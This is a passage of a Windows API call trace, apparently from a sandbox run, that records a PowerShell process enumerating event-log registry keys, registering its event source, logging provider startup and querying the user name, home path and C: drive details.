	[0167.665] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x1, lpName=0x721bd8, lpcchName=0x14e3a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14e3a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.665] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x2, lpName=0x721bd8, lpcchName=0x14e3a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14e3a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.665] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x3, lpName=0x721bd8, lpcchName=0x14e3a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14e3a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.665] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x4, lpName=0x721bd8, lpcchName=0x14e3a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14e3a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.665] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x5, lpName=0x721bd8, lpcchName=0x14e3a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14e3a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.665] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x6, lpName=0x721bd8, lpcchName=0x14e3a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14e3a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.665] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x7, lpName=0x721bd8, lpcchName=0x14e3a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14e3a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.665] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x8, lpName=0x721bd8, lpcchName=0x14e3a4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14e3a4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0167.666] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e350 | out: phkResult=0x14e350*=0x388) returned 0x0
	[0167.666] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e350 | out: phkResult=0x14e350*=0x0) returned 0x2
	[0167.666] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e350 | out: phkResult=0x14e350*=0x3ac) returned 0x0
	[0167.666] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e350 | out: phkResult=0x14e350*=0x0) returned 0x2
	[0167.666] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e350 | out: phkResult=0x14e350*=0x3b0) returned 0x0
	[0167.666] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e350 | out: phkResult=0x14e350*=0x0) returned 0x2
	[0167.666] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e350 | out: phkResult=0x14e350*=0x3b4) returned 0x0
	[0167.667] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e350 | out: phkResult=0x14e350*=0x0) returned 0x2
	[0167.667] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e350 | out: phkResult=0x14e350*=0x3b8) returned 0x0
	[0167.667] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e350 | out: phkResult=0x14e350*=0x0) returned 0x2
	[0167.667] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e350 | out: phkResult=0x14e350*=0x3bc) returned 0x0
	[0167.667] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e350 | out: phkResult=0x14e350*=0x0) returned 0x2
	[0167.667] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e350 | out: phkResult=0x14e350*=0x3c0) returned 0x0
	[0167.668] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e350 | out: phkResult=0x14e350*=0x0) returned 0x2
	[0167.668] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e350 | out: phkResult=0x14e350*=0x3c4) returned 0x0
	[0167.668] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e350 | out: phkResult=0x14e350*=0x0) returned 0x2
	[0167.668] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e350 | out: phkResult=0x14e350*=0x3c8) returned 0x0
	[0167.668] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e350 | out: phkResult=0x14e350*=0x3cc) returned 0x0
	[0167.668] RegCloseKey (hKey=0x3cc) returned 0x0
	[0167.668] RegCloseKey (hKey=0x3a8) returned 0x0
	[0167.669] RegCloseKey (hKey=0x3c8) returned 0x0
	[0168.005] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x4f70004
	[0168.296] GetLastError () returned 0x0
	[0168.299] ReportEventW (hEventLog=0x4f70004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ca0964*="WSMan", lpRawData=0x2ca080c) returned 1
	[0168.305] GetLastError () returned 0x0
	[0168.306] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0168.306] GetLastError () returned 0xcb
	[0168.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dec4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.307] GetLastError () returned 0xcb
	[0168.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.307] GetLastError () returned 0xcb
	[0168.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.307] GetLastError () returned 0xcb
	[0168.308] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x722398, nSize=0x14e4c4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14e4c4) returned 0x1
	[0168.308] GetLastError () returned 0xcb
	[0168.308] GetUserNameW (in: lpBuffer=0x721bd8, pcbBuffer=0x14e4cc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14e4cc) returned 1
	[0168.309] ReportEventW (hEventLog=0x4f70004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ca4840*="Alias", lpRawData=0x2ca46fc) returned 1
	[0168.315] GetLastError () returned 0x0
	[0168.316] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0168.316] GetLastError () returned 0xcb
	[0168.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dec4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.317] GetLastError () returned 0xcb
	[0168.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.317] GetLastError () returned 0xcb
	[0168.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.317] GetLastError () returned 0xcb
	[0168.317] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x722398, nSize=0x14e4c4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14e4c4) returned 0x1
	[0168.317] GetLastError () returned 0xcb
	[0168.318] GetUserNameW (in: lpBuffer=0x721bd8, pcbBuffer=0x14e4cc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14e4cc) returned 1
	[0168.318] ReportEventW (hEventLog=0x4f70004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ca87d4*="Environment", lpRawData=0x2ca8690) returned 1
	[0168.318] GetLastError () returned 0x0
	[0168.320] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0168.320] GetLastError () returned 0xcb
	[0168.321] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0168.321] GetLastError () returned 0xcb
	[0168.321] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0168.321] GetLastError () returned 0xcb
	[0168.321] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x14dff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0168.321] GetLastError () returned 0xcb
	[0168.321] SetErrorMode (uMode=0x1) returned 0x1
	[0168.321] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x14e474 | out: lpFileInformation=0x14e474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0168.322] GetLastError () returned 0xcb
	[0168.322] SetErrorMode (uMode=0x1) returned 0x1
	[0168.325] GetLogicalDrives () returned 0x4
	[0168.325] GetLastError () returned 0xcb
	[0168.327] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14df18, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.327] GetLastError () returned 0xcb
	[0168.328] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0168.328] GetLastError () returned 0xcb
	[0168.328] SetErrorMode (uMode=0x1) returned 0x1
	[0168.331] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x721cd8, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x14e440, lpMaximumComponentLength=0x14e43c, lpFileSystemFlags=0x14e438, lpFileSystemNameBuffer=0x721bd8, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14e440*=0x9c354b42, lpMaximumComponentLength=0x14e43c*=0xff, lpFileSystemFlags=0x14e438*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0168.331] GetLastError () returned 0xcb
	[0168.331] SetErrorMode (uMode=0x1) returned 0x1
	[0168.331] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0168.331] GetLastError () returned 0xcb
	[0168.331] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14dfa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.331] GetLastError () returned 0xcb
	[0168.331] SetErrorMode (uMode=0x1) returned 0x1
	[0168.331] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2ca9a0c | out: lpFileInformation=0x2ca9a0c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0168.332] GetLastError () returned 0xcb
	[0168.332] SetErrorMode (uMode=0x1) returned 0x1
	[0168.332] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14dfa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.332] GetLastError () returned 0xcb
	[0168.332] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14df2c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.332] GetLastError () returned 0xcb
	[0168.332] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0168.332] GetLastError () returned 0xcb
	[0168.334] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14dee8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.334] GetLastError () returned 0xcb
	[0168.334] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0168.334] GetLastError () returned 0xcb
	[0168.335] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14def0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.335] GetLastError () returned 0xcb
	[0168.335] SetErrorMode (uMode=0x1) returned 0x1
	[0168.335] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2caa664 | out: lpFileInformation=0x2caa664*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0168.335] GetLastError () returned 0xcb
	[0168.335] SetErrorMode (uMode=0x1) returned 0x1
	[0168.335] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14def8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.335] GetLastError () returned 0xcb
	[0168.335] SetErrorMode (uMode=0x1) returned 0x1
	[0168.335] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2caa7b4 | out: lpFileInformation=0x2caa7b4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0168.335] GetLastError () returned 0xcb
	[0168.335] SetErrorMode (uMode=0x1) returned 0x1
	[0168.335] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14df3c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0168.336] GetLastError () returned 0xcb
	[0168.336] SetErrorMode (uMode=0x1) returned 0x1
	[0168.336] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2caa954 | out: lpFileInformation=0x2caa954*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0168.336] GetLastError () returned 0xcb
	[0168.336] SetErrorMode (uMode=0x1) returned 0x1
	[0168.336] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x722398, nSize=0x14e4c4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14e4c4) returned 0x1
	[0168.336] GetLastError () returned 0xcb
	[0168.337] GetUserNameW (in: lpBuffer=0x721bd8, pcbBuffer=0x14e4cc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14e4cc) returned 1
	[0168.337] ReportEventW (hEventLog=0x4f70004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2cad6dc*="FileSystem", lpRawData=0x2cad598) returned 1
	[0168.467] GetLastError () returned 0x0
	[0168.469] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0168.469] GetLastError () returned 0xcb
	[0168.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.470] GetLastError () returned 0xcb
	[0168.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.470] GetLastError () returned 0xcb
	[0168.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.470] GetLastError () returned 0xcb
	[0168.470] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x722398, nSize=0x14e4c4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14e4c4) returned 0x1
	[0168.471] GetLastError () returned 0xcb
	[0168.471] GetUserNameW (in: lpBuffer=0x721bd8, pcbBuffer=0x14e4cc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14e4cc) returned 1
	[0168.471] ReportEventW (hEventLog=0x4f70004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2cb17cc*="Function", lpRawData=0x2cb1688) returned 1
	[0168.479] GetLastError () returned 0x0
	[0168.483] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0168.484] GetLastError () returned 0xcb
	[0168.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ded8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.490] GetLastError () returned 0xcb
	[0168.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.490] GetLastError () returned 0xcb
	[0168.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.490] GetLastError () returned 0xcb
	[0168.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.490] GetLastError () returned 0xcb
	[0168.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ded8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.976] GetLastError () returned 0xcb
	[0168.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.976] GetLastError () returned 0xcb
	[0168.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.976] GetLastError () returned 0xcb
	[0168.978] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x722398, nSize=0x14e4c4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14e4c4) returned 0x1
	[0169.134] GetLastError () returned 0xcb
	[0169.134] GetUserNameW (in: lpBuffer=0x721bd8, pcbBuffer=0x14e4cc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14e4cc) returned 1
	[0169.135] ReportEventW (hEventLog=0x4f70004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2cca888*="Registry", lpRawData=0x2cca744) returned 1
	[0169.254] GetLastError () returned 0x0
	[0169.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dec4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0169.256] GetLastError () returned 0x0
	[0169.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0169.256] GetLastError () returned 0x0
	[0169.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14de74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0169.256] GetLastError () returned 0x0
	[0169.262] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x722398, nSize=0x14e4c4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14e4c4) returned 0x1
	[0169.263] GetLastError () returned 0x0
	[0169.264] GetUserNameW (in: lpBuffer=0x721bd8, pcbBuffer=0x14e4cc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14e4cc) returned 1
	[0169.265] ReportEventW (hEventLog=0x4f70004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2cce670*="Variable", lpRawData=0x2cce52c) returned 1
	[0169.424] GetLastError () returned 0x0
	[0169.426] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0169.426] GetLastError () returned 0xcb
	[0169.437] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0169.438] GetLastError () returned 0xcb
